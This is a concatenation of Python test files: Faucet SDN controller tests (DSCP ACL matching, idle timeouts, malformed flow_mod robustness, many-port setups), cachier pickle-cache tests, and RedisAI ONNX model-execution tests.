source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.OUTPUT_MAC)
# scapy command to create and send an ICMP packet
scapy_pkt = self.scapy_icmp(
self.SRC_MAC, source_host.defaultIntf(), source_host.IP(),
dest_host.IP(), dst=self.OUTPUT_MAC)
tcpdump_filter = "ether dst %s" % self.OUTPUT_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host has been
# overwritten to be an ICMP echo request
self.assertTrue(re.search("ICMP echo request", tcpdump_txt))
def test_untagged(self):
pass
class FaucetDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSCP and eth_type, based on the ryu API definition,
# e.g. {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
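# (DSCP 46 shifted into the upper six bits of the TOS byte gives 46 << 2 == 184,
# which is why scapy_dscp below is called with a TOS value of 184.)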
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and will proceed through the faucet pipeline. This test verifies
# that packets with the dscp field set can have their eth_dst field modified.
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
class FaucetOrderedDscpMatchTest(FaucetUntaggedTest):
# Match all packets with this IP_DSCP and eth_type, based on the ryu API definition,
# e.g. {"ip_dscp": 3, "eth_type": 2048}
# Note: the ip_dscp field is translated to nw_tos in OpenFlow 1.0:
# see https://tools.ietf.org/html/rfc2474#section-3
IP_DSCP_MATCH = 46
ETH_TYPE = 2048
SRC_MAC = '0e:00:00:00:00:ff'
DST_MAC = '0e:00:00:00:00:02'
REWRITE_MAC = '0f:00:12:23:48:03'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
ip_dscp: %d
dl_type: 0x800
actions:
allow: 1
output:
- set_fields:
- eth_dst: "%s"
- rule:
actions:
allow: 1
""" % (IP_DSCP_MATCH, REWRITE_MAC)
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Tests that a packet with an ip_dscp field will be appropriately
# matched and will proceed through the faucet pipeline. This test verifies
# that packets with the dscp field set can have their eth_dst field modified.
source_host, dest_host = self.hosts_name_ordered()[0:2]
dest_host.setMAC(self.REWRITE_MAC)
self.wait_until_matching_flow(
{'ip_dscp': self.IP_DSCP_MATCH,
'eth_type': self.ETH_TYPE},
table_id=self._PORT_ACL_TABLE)
# scapy command to create and send a packet with the specified fields
scapy_pkt = self.scapy_dscp(self.SRC_MAC, self.DST_MAC, 184,
source_host.defaultIntf())
tcpdump_filter = "ether dst %s" % self.REWRITE_MAC
tcpdump_txt = self.tcpdump_helper(
dest_host, tcpdump_filter, [lambda: source_host.cmd(scapy_pkt)],
root_intf=True, packets=1)
# verify that the packet we've received on the dest_host is from the
# source MAC address
self.assertTrue(re.search("%s > %s" % (self.SRC_MAC, self.REWRITE_MAC),
tcpdump_txt))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 1
use_idle_timeout: True
""" + CONFIG_BOILER_UNTAGGED
def wait_for_host_removed(self, host, in_port, timeout=5):
for _ in range(timeout):
if not self.host_learned(host, in_port=in_port, timeout=1):
return
self.fail('host %s still learned' % host)
def wait_for_flowremoved_msg(self, src_mac=None, dst_mac=None, timeout=30):
pattern = "OFPFlowRemoved"
mac = None
if src_mac:
pattern = "OFPFlowRemoved(.*)'eth_src': '%s'" % src_mac
mac = src_mac
if dst_mac:
pattern = "OFPFlowRemoved(.*)'eth_dst': '%s'" % dst_mac
mac = dst_mac
for _ in range(timeout):
for _, debug_log_name in self._get_ofchannel_logs():
with open(debug_log_name) as debug_log:
debug = debug_log.read()
if re.search(pattern, debug):
return
time.sleep(1)
self.fail('Not received OFPFlowRemoved for host %s' % mac)
def wait_for_host_log_msg(self, host_mac, msg):
log_file = self.env['faucet']['FAUCET_LOG']
host_log_re = r'.*%s %s.*' % (msg, host_mac)
self.wait_until_matching_lines_from_file(host_log_re, log_file)
def test_untagged(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[:2]
self.swap_host_macs(first_host, second_host)
for host, port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.require_host_learned(host, in_port=int(port))
@unittest.skip('use_idle_timeout unreliable')
class FaucetWithUseIdleTimeoutRuleExpiredTest(FaucetWithUseIdleTimeoutTest):
def test_untagged(self):
"""Host that is actively sending should have its dst rule renewed as the
rule expires. Host that is not sending expires as usual.
"""
self.ping_all_when_learned()
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()
self.host_ipv4_alias(first_host, ipaddress.ip_interface('10.99.99.1/24'))
first_host.cmd('arp -s %s %s' % (second_host.IP(), second_host.MAC()))
first_host.cmd('timeout 120s ping -I 10.99.99.1 %s &' % second_host.IP())
for host in (second_host, third_host, fourth_host):
self.host_drop_all_ips(host)
self.wait_for_host_log_msg(first_host.MAC(), 'refreshing host')
self.assertTrue(self.host_learned(
first_host, in_port=int(self.port_map['port_1'])))
for host, port in (
(second_host, self.port_map['port_2']),
(third_host, self.port_map['port_3']),
(fourth_host, self.port_map['port_4'])):
self.wait_for_flowremoved_msg(src_mac=host.MAC())
self.wait_for_host_log_msg(host.MAC(), 'expiring host')
self.wait_for_host_removed(host, in_port=int(port))
class FaucetDisconnectTest(FaucetUntaggedTest):
"""Test that switch works properly after repeated disconnections
caused by DPID mismatch"""
def update_config(self, dpid):
"""Update config with good/bad DPID"""
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['dp_id'] = int(dpid)
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_untagged(self):
"""Run untagged test after disconnects and config update"""
# We update the config with a bad DPID and then wait for
# 'unknown datapath' messages, indicating switch connections that
# FAUCET has rejected. The switch should see them as
# 'connection reset by peer'.
mask = int(16*'f', 16)
bad_dpid = (int(self.dpid) + 0xdeadbeef) & mask
faucet_log = self.env['faucet']['FAUCET_LOG']
self.update_config(dpid=bad_dpid)
self.wait_until_matching_lines_from_file(
r'.*ERROR.*unknown datapath', faucet_log, timeout=60, count=4)
self.update_config(dpid=self.dpid)
super().test_untagged()
class FaucetBadFlowModTest(FaucetUntaggedTest):
"""Test that switch and FAUCET still work after we send some bad flow_mods"""
def base_flow_mod(self):
"""Return a base flow mod that we mess with"""
return {'dpid': self.dpid,
'cookie': 0,
'cookie_mask': 0,
'table_id': 0,
'idle_timeout': 29,
'hard_timeout': 91,
'flags': 1,
'priority': 1,
'match': {'in_port': 1},
'actions': [{
'type': 'OUTPUT',
'port': 2}]}
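# This dict appears to mirror the JSON body accepted by the ofctl REST
# 'stats/flowentry/modify' endpoint that send_flow_mod() posts to below.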
# For now, the flow_mods are reasonably well-formed but with
# parameters that are incorrect for the switch and for FAUCET
def bad_dpid(self):
"""Return a random, bad dpid parameter"""
mask = int(16*'f', 16)
dpid = (int(self.dpid) + random.randint(0, 1 << 63)) & mask
return {'dpid': dpid}
@staticmethod
def bad_table():
"""Return a bad table ID parameter"""
# This should be higher than FAUCET's max table ID
bad_table_start = 32
return {'table_id': random.randint(bad_table_start, 100)}
def bad_port(self):
"""Return a (hopefully very) bad port number"""
max_port = max(self.port_map.values())
offset = random.randint(0x1000, 0xE0000000)
mask = 0xEFFFFFFF
return (max_port + offset) & mask
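# The offset pushes the value well past any real port on the switch, while the
# mask presumably keeps it below the OpenFlow reserved-port range (OFPP_MAX and
# friends), so the switch should treat it as simply nonexistent.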
def bad_match(self):
"""Return a bad match field"""
matches = (
# Bad input port
{'in_port': self.bad_port()},
# IPv4 (broadcast) src with bad ('reserved') ethertype
{'nw_src': '255.255.255.255', 'dl_type': 0xFFFF},
# IPv4 with IPv6 ethertype:
{'nw_src': '1.2.3.4', 'dl_type': 0x86DD},
# IPv4 address as IPv6 dst
{'ipv6_dst': '1.2.3.4', 'dl_type': 0x86DD},
# IPv6 dst with Bad/reserved ip_proto
{'ipv6_dst': '2001::aaaa:bbbb:cccc:1111', 'ip_proto': 255},
# Destination port but no transport protocol
{'tp_dst': 80},
# ARP opcode on non-ARP packet
{'arp_op': 0x3, 'dl_type': 0x1234})
match = random.sample(matches, 1)[0]
return {'match': match}
def bad_actions(self, count=1):
"""Return a questionable actions parameter"""
actions = (
{'type': 'OUTPUT', 'port': self.bad_port()},
{'type': 'PUSH_MPLS', 'ethertype': 0x8BAD},
{'type': 'SET_QUEUE', 'queue_id':
random.randint(0x8000, 0xFFFFFFFF)})
return {'actions': random.sample(actions, count)}
# Possible options for bad parameters
bad_options = ('dpid', 'table', 'match', 'actions')
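# ('port' is not listed here because bad_port() is only exercised indirectly,
# via bad_match() and bad_actions() above.)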
def bad_flow_mod(self):
"""Return a flow mod with some bad parameters"""
flow_mod = self.base_flow_mod()
# Add two or more bad options
options = random.sample(self.bad_options,
random.randint(2, len(self.bad_options)))
for option in options:
param = getattr(self, 'bad_%s' % option)()
flow_mod.update(param)
return flow_mod
def send_flow_mod(self, flow_mod, timeout=5):
"""Send flow_mod to switch via ofctl"""
int_dpid = mininet_test_util.str_int_dpid(self.dpid)
return self._ofctl_post(int_dpid, 'stats/flowentry/modify',
timeout=timeout, params=flow_mod)
def tearDown(self, ignore_oferrors=True):
"""Ignore OF errors on teardown"""
oferrors = super().tearDown(ignore_oferrors)
oferrors = re.findall(r'type: (\w+)', oferrors)
counter = collections.Counter(oferrors)
error('Ignored OF error count: %s\n' % dict(counter))
# TODO: ensure at least one error is always generated.
# pylint: disable=arguments-differ
def test_untagged(self, count=10):
"""Send a bunch of bad flow mods, then verify connectivity"""
for _ in range(count):
flow_mod = self.bad_flow_mod()
error('sending bad flow_mod', flow_mod, '\n')
self.send_flow_mod(flow_mod)
self.ping_all_when_learned()
class FaucetUntaggedMorePortsBase(FaucetUntaggedTest):
"""Base class for untagged test with more ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 16 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 180 # Timeout for event logger process
# Config lines for additional ports
CONFIG_EXTRA_PORT = """
{port}:
native_vlan: 100""" + "\n"
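# One of these stanzas is appended to CONFIG for each port beyond those already
# present in CONFIG_BOILER_UNTAGGED; see _init_faucet_config() below.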
def _init_faucet_config(self): # pylint: disable=invalid-name
"""Extend config with more ports if needed"""
self.assertTrue(self.CONFIG.endswith(CONFIG_BOILER_UNTAGGED))
# We know how to extend the config for more ports
base_port_count = len(re.findall('port', CONFIG_BOILER_UNTAGGED))
ports = self.topo.dpid_ports(self.dpid)
for port in ports[base_port_count:]:
self.CONFIG += self.CONFIG_EXTRA_PORT.format(port=port)
super()._init_faucet_config()
def setUp(self):
"""Make sure N_UNTAGGED doesn't exceed hw port count"""
if self.config and self.config.get('hw_switch', False):
self.N_UNTAGGED = min(len(self.config['dp_ports']),
self.N_UNTAGGED)
error('(%d ports) ' % self.N_UNTAGGED)
super().setUp()
class FaucetSingleUntagged32PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 32 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 32 # Maximum number of ports to test
@unittest.skip('slow and potentially unreliable on travis')
class FaucetSingleUntagged48PortTest(FaucetUntaggedMorePortsBase):
"""Untagged test with up to 48 ports"""
# pylint: disable=invalid-name
N_UNTAGGED = 48 # Maximum number of ports to test
EVENT_LOGGER_TIMEOUT = 360 # Timeout for event logger process
|
test_pickle_core.py
|
"""Test for the Cachier python package."""
# This file is part of Cachier.
# https://github.com/shaypal5/cachier
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2016, Shay Palachy <shaypal5@gmail.com>
# from os.path import (
# realpath,
# dirname
# )
import os
from time import (
time,
sleep
)
from datetime import timedelta
from random import random
import threading
try:
import queue
except ImportError: # python 2
import Queue as queue
import hashlib
import pandas as pd
from cachier import cachier
from cachier.pickle_core import DEF_CACHIER_DIR
# Pickle core tests
@cachier(next_time=False)
def _takes_5_seconds(arg_1, arg_2):
"""Some function."""
sleep(5)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
def test_pickle_core():
"""Basic Pickle core functionality."""
_takes_5_seconds.clear_cache()
_takes_5_seconds('a', 'b')
start = time()
_takes_5_seconds('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_5_seconds.clear_cache()
SECONDS_IN_DELTA = 3
DELTA = timedelta(seconds=SECONDS_IN_DELTA)
@cachier(stale_after=DELTA, next_time=False)
def _stale_after_seconds(arg_1, arg_2):
"""Some function."""
return random()
def test_stale_after():
"""Testing the stale_after functionality."""
_stale_after_seconds.clear_cache()
val1 = _stale_after_seconds(1, 2)
val2 = _stale_after_seconds(1, 2)
val3 = _stale_after_seconds(1, 3)
assert val1 == val2
assert val1 != val3
sleep(3)
val4 = _stale_after_seconds(1, 2)
assert val4 != val1
_stale_after_seconds.clear_cache()
@cachier(stale_after=DELTA, next_time=True)
def _stale_after_next_time(arg_1, arg_2):
"""Some function."""
return random()
def test_stale_after_next_time():
"""Testing the stale_after with next_time functionality."""
_stale_after_next_time.clear_cache()
val1 = _stale_after_next_time(1, 2)
val2 = _stale_after_next_time(1, 2)
val3 = _stale_after_next_time(1, 3)
assert val1 == val2
assert val1 != val3
sleep(SECONDS_IN_DELTA + 1)
val4 = _stale_after_next_time(1, 2)
assert val4 == val1
sleep(0.5)
val5 = _stale_after_next_time(1, 2)
assert val5 != val1
_stale_after_next_time.clear_cache()
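# Taken together, the two tests above exercise the two stale_after behaviours:
# with next_time=False a stale entry is recalculated before returning (val4 != val1),
# while with next_time=True the stale value is served once more and a fresh value is
# only seen on the following call (val4 == val1, then val5 != val1).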
@cachier()
def _random_num():
return random()
@cachier()
def _random_num_with_arg(a):
# print(a)
return random()
def test_overwrite_cache():
"""Tests that the overwrite feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(overwrite_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 == int3
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', overwrite_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 == int3
_random_num_with_arg.clear_cache()
def test_ignore_cache():
"""Tests that the ignore_cache feature works correctly."""
_random_num.clear_cache()
int1 = _random_num()
int2 = _random_num()
assert int2 == int1
int3 = _random_num(ignore_cache=True)
assert int3 != int1
int4 = _random_num()
assert int4 != int3
assert int4 == int1
_random_num.clear_cache()
_random_num_with_arg.clear_cache()
int1 = _random_num_with_arg('a')
int2 = _random_num_with_arg('a')
assert int2 == int1
int3 = _random_num_with_arg('a', ignore_cache=True)
assert int3 != int1
int4 = _random_num_with_arg('a')
assert int4 != int3
assert int4 == int1
_random_num_with_arg.clear_cache()
@cachier()
def _takes_time(arg_1, arg_2):
"""Some function."""
sleep(2) # this has to be enough time for check_calculation to run twice
return random() + arg_1 + arg_2
def _calls_takes_time(res_queue):
res = _takes_time(0.13, 0.02)
res_queue.put(res)
def test_pickle_being_calculated():
"""Testing pickle core handling of being calculated scenarios."""
_takes_time.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_takes_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier(stale_after=timedelta(seconds=1), next_time=True)
def _being_calc_next_time(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
def _calls_being_calc_next_time(res_queue):
res = _being_calc_next_time(0.13, 0.02)
res_queue.put(res)
def test_being_calc_next_time():
"""Testing pickle core handling of being calculated scenarios."""
_takes_time.clear_cache()
_being_calc_next_time(0.13, 0.02)
sleep(1.1)
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread2 = threading.Thread(
target=_calls_being_calc_next_time, kwargs={'res_queue': res_queue})
thread1.start()
sleep(0.5)
thread2.start()
thread1.join()
thread2.join()
assert res_queue.qsize() == 2
res1 = res_queue.get()
res2 = res_queue.get()
assert res1 == res2
@cachier()
def _bad_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
# _BAD_CACHE_FNAME = '.__main__._bad_cache'
_BAD_CACHE_FNAME = '.tests.test_pickle_core._bad_cache'
EXPANDED_CACHIER_DIR = os.path.expanduser(DEF_CACHIER_DIR)
_BAD_CACHE_FPATH = os.path.join(EXPANDED_CACHIER_DIR, _BAD_CACHE_FNAME)
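# The pickle core appears to keep each function's cache in a single pickle file
# named '.<module path>.<function name>' under the cachier dir, which is what lets
# these tests corrupt (or, further below, delete) the file out from under a running call.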
def _calls_bad_cache(res_queue, trash_cache):
try:
res = _bad_cache(0.13, 0.02)
if trash_cache:
with open(_BAD_CACHE_FPATH, 'w') as cache_file:
cache_file.seek(0)
cache_file.truncate()
res_queue.put(res)
except Exception as exc: # skipcq: PYL-W0703
res_queue.put(exc)
def _helper_bad_cache_file(sleeptime):
"""Test pickle core handling of bad cache files."""
_bad_cache.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_bad_cache,
kwargs={'res_queue': res_queue, 'trash_cache': True})
thread2 = threading.Thread(
target=_calls_bad_cache,
kwargs={'res_queue': res_queue, 'trash_cache': False})
thread1.start()
sleep(sleeptime)
thread2.start()
thread1.join()
thread2.join()
if not res_queue.qsize() == 2:
return False
res1 = res_queue.get()
if not isinstance(res1, float):
return False
res2 = res_queue.get()
if not (res2 is None or isinstance(res2, KeyError)):
return False
return True
# we want this to succeed at least once
def test_bad_cache_file():
"""Test pickle core handling of bad cache files."""
sleeptimes = [0.5, 0.1, 0.2, 0.3, 0.8, 1, 2]
sleeptimes = sleeptimes + sleeptimes
for sleeptime in sleeptimes:
if _helper_bad_cache_file(sleeptime):
return
assert False
@cachier()
def _delete_cache(arg_1, arg_2):
"""Some function."""
sleep(1)
return random() + arg_1 + arg_2
# _DEL_CACHE_FNAME = '.__main__._delete_cache'
_DEL_CACHE_FNAME = '.tests.test_pickle_core._delete_cache'
_DEL_CACHE_FPATH = os.path.join(EXPANDED_CACHIER_DIR, _DEL_CACHE_FNAME)
def _calls_delete_cache(res_queue, del_cache):
try:
# print('in')
res = _delete_cache(0.13, 0.02)
# print('out with {}'.format(res))
if del_cache:
# print('deleteing!')
os.remove(_DEL_CACHE_FPATH)
# print(os.path.isfile(_DEL_CACHE_FPATH))
res_queue.put(res)
except Exception as exc: # skipcq: PYL-W0703
# print('found')
res_queue.put(exc)
def _helper_delete_cache_file(sleeptime):
"""Test pickle core handling of missing cache files."""
_delete_cache.clear_cache()
res_queue = queue.Queue()
thread1 = threading.Thread(
target=_calls_delete_cache,
kwargs={'res_queue': res_queue, 'del_cache': True})
thread2 = threading.Thread(
target=_calls_delete_cache,
kwargs={'res_queue': res_queue, 'del_cache': False})
thread1.start()
sleep(sleeptime)
thread2.start()
thread1.join()
thread2.join()
if not res_queue.qsize() == 2:
return False
res1 = res_queue.get()
# print(res1)
if not isinstance(res1, float):
return False
res2 = res_queue.get()
if not (isinstance(res2, KeyError) or res2 is None):
return False
return True
# print(res2)
# print(type(res2))
def test_delete_cache_file():
"""Test pickle core handling of missing cache files."""
sleeptimes = [0.5, 0.3, 0.1, 0.2, 0.8, 1, 2]
sleeptimes = sleeptimes + sleeptimes
for sleeptime in sleeptimes:
if _helper_delete_cache_file(sleeptime):
return
assert False
def test_clear_being_calculated():
"""Test pickle core clear `being calculated` functionality."""
_takes_time.clear_being_calculated()
@cachier(stale_after=timedelta(seconds=1), next_time=True)
def _error_throwing_func(arg1):
if not hasattr(_error_throwing_func, 'count'):
_error_throwing_func.count = 0
_error_throwing_func.count += 1
if _error_throwing_func.count > 1:
raise ValueError("Tiny Rick!")
return 7
def test_error_throwing_func():
res1 = _error_throwing_func(4)
sleep(1.5)
res2 = _error_throwing_func(4)
assert res1 == res2
# test custom cache dir for pickle core
CUSTOM_DIR = '~/.exparrot'
EXPANDED_CUSTOM_DIR = os.path.expanduser(CUSTOM_DIR)
@cachier(next_time=False, cache_dir=CUSTOM_DIR)
def _takes_5_seconds_custom_dir(arg_1, arg_2):
"""Some function."""
sleep(5)
return 'arg_1:{}, arg_2:{}'.format(arg_1, arg_2)
def test_pickle_core_custom_cache_dir():
"""Basic Pickle core functionality."""
_takes_5_seconds_custom_dir.clear_cache()
_takes_5_seconds_custom_dir('a', 'b')
start = time()
_takes_5_seconds_custom_dir('a', 'b', verbose_cache=True)
end = time()
assert end - start < 1
_takes_5_seconds_custom_dir.clear_cache()
assert _takes_5_seconds_custom_dir.cache_dpath() == EXPANDED_CUSTOM_DIR
def test_callable_hash_param():
def _hash_params(args, kwargs):
def _hash(obj):
if isinstance(obj, pd.core.frame.DataFrame):
return hashlib.sha256(pd.util.hash_pandas_object(obj).values.tobytes()).hexdigest()
return obj
k_args = tuple(map(_hash, args))
k_kwargs = tuple(sorted({k: _hash(v) for k, v in kwargs.items()}.items()))
return k_args + k_kwargs
@cachier(hash_params=_hash_params)
def _params_with_dataframe(*args, **kwargs):
"""Some function."""
return random()
_params_with_dataframe.clear_cache()
df_a = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
df_b = pd.DataFrame.from_dict(dict(a=[0], b=[2], c=[3]))
value_a = _params_with_dataframe(df_a, 1)
value_b = _params_with_dataframe(df_b, 1)
assert value_a == value_b # same content --> same key
value_a = _params_with_dataframe(1, df=df_a)
value_b = _params_with_dataframe(1, df=df_b)
assert value_a == value_b # same content --> same key
def test_cache_key():
"""Test that the calls some_func(1, ("a", 2)) and some_func(1, a=2)
are distinguished by the cache."""
@cachier()
def some_func(*args, **kwargs):
return len(kwargs) > 0
some_func(1, ("a", 2))
assert some_func(1, a=2)
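# A minimal illustrative sketch (hypothetical helpers, not cachier's actual key function): a naive key built
# as args + sorted kwargs collides for some_func(1, ("a", 2)) and some_func(1, a=2), which is exactly what
# test_cache_key guards against; keeping args and kwargs in separate slots avoids the collision.
def _naive_key(args, kwargs):
    return args + tuple(sorted(kwargs.items()))
def _safe_key(args, kwargs):
    return (args, tuple(sorted(kwargs.items())))
assert _naive_key((1, ("a", 2)), {}) == _naive_key((1,), {"a": 2})  # the collision
assert _safe_key((1, ("a", 2)), {}) != _safe_key((1,), {"a": 2})  # distinguished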
|
tests_onnx.py
|
import shutil
import sys
import os
import subprocess
import threading
import time
import redis
from includes import *
from RLTest import Env
'''
python -m RLTest --test tests_onnx.py --module path/to/redisai.so
'''
def test_onnx_modelrun_mnist(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('mnist.onnx')
wrong_model_pb = load_file_content('graph.pb')
sample_raw = load_file_content('one.raw')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
env.assertEqual(ret[5], b'')
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'TAG', 'version:2', 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.MODELGET', 'm{1}', 'META')
env.assertEqual(len(ret), 16)
# TODO: enable me. CI is having issues on GPU asserts of ONNX and CPU
if DEVICE == "CPU":
env.assertEqual(ret[1], b'ONNX')
env.assertEqual(ret[3], b'CPU')
env.assertEqual(ret[5], b'version:2')
env.assertEqual(len(ret[11]), 1)
env.assertEqual(len(ret[13]), 1)
check_error_message(env, con, "No graph was found in the protobuf.",
'AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', wrong_model_pb)
con.execute_command('AI.TENSORSET', 'a{1}', 'FLOAT', 1, 1, 28, 28, 'BLOB', sample_raw)
check_error_message(env, con, "Number of keys given as INPUTS here does not match model definition",
'AI.MODELEXECUTE', 'm{1}', 'INPUTS', 3, 'a{1}', 'b{1}', 'c{1}', 'OUTPUTS', 'c{1}')
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'a{1}', 'OUTPUTS', 1, 'b{1}')
ensureSlaveSynced(con, env)
values = con.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
argmax = max(range(len(values)), key=lambda i: values[i])
env.assertEqual(argmax, 1)
if env.useSlaves:
con2 = env.getSlaveConnection()
values2 = con2.execute_command('AI.TENSORGET', 'b{1}', 'VALUES')
env.assertEqual(values2, values)
def test_onnx_string_tensors(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('identity_string.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BLOB', model_pb)
env.assertEqual(ret, b'OK')
# Execute onnx model whose input is string tensor with shape [2,2], that outputs the input
string_tensor_blob = b'input11\0input12\0input21\0input22\0'
con.execute_command('AI.TENSORSET', 'in_tensor{1}', 'STRING', 2, 2, 'BLOB', string_tensor_blob)
ret = con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'in_tensor{1}', 'OUTPUTS', 1, 'out_tensor{1}')
env.assertEqual(ret, b'OK')
_, tensor_dtype, _, tensor_dim, _, tensor_values = con.execute_command('AI.TENSORGET', 'out_tensor{1}', 'META', 'VALUES')
env.assertEqual(tensor_dtype, b'STRING')
env.assertEqual(tensor_dim, [2, 2])
env.assertEqual(tensor_values, [b'input11', b'input12', b'input21', b'input22'])
if env.useSlaves:
ensureSlaveSynced(con, env)
slave_con = env.getSlaveConnection()
slave_tensor_values = slave_con.execute_command('AI.TENSORGET', 'out_tensor{1}', 'VALUES')
env.assertEqual(tensor_values, slave_tensor_values)
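# A minimal illustrative sketch (hypothetical helper, not used by the tests above): the string tensor blob in
# test_onnx_string_tensors is a flat sequence of null-terminated strings, which this helper reproduces for the
# [2,2] tensor used above.
def _example_string_tensor_blob(strings):
    return b''.join(s.encode('utf-8') + b'\0' for s in strings)
assert _example_string_tensor_blob(['input11', 'input12', 'input21', 'input22']) == b'input11\0input12\0input21\0input22\0'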
def test_onnx_string_tensors_batching(env):
if not TEST_ONNX:
env.debugPrint("skipping {} since TEST_ONNX=0".format(sys._getframe().f_code.co_name), force=True)
return
con = get_connection(env, '{1}')
model_pb = load_file_content('identity_string.onnx')
ret = con.execute_command('AI.MODELSTORE', 'm{1}', 'ONNX', DEVICE, 'BATCHSIZE', 2, 'MINBATCHSIZE', 2,
'BLOB', model_pb)
env.assertEqual(ret, b'OK')
con.execute_command('AI.TENSORSET', 'first_batch{1}', 'STRING', 1, 2, 'VALUES', 'this is\0', 'the first batch\0')
con.execute_command('AI.TENSORSET', 'second_batch{1}', 'STRING', 1, 2, 'VALUES', 'that is\0', 'the second batch\0')
def run():
con2 = get_connection(env, '{1}')
con2.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'first_batch{1}', 'OUTPUTS', 1, 'first_output{1}')
t = threading.Thread(target=run)
t.start()
con.execute_command('AI.MODELEXECUTE', 'm{1}', 'INPUTS', 1, 'second_batch{1}', 'OUTPUTS', 1, 'second_output{1}')
t.join()
out_values = con.execute_command('AI.TENSORGET', 'first_batch{1}', 'VALUES')
env.assertEqual(out_values, [b'this is', b'the first batch'])
out_values = con.execute_command('AI.TENSORGET', 'second_batch{1}', 'VALUES')
env.assertEqual(out_values, [b'that is', b'the second batch'])
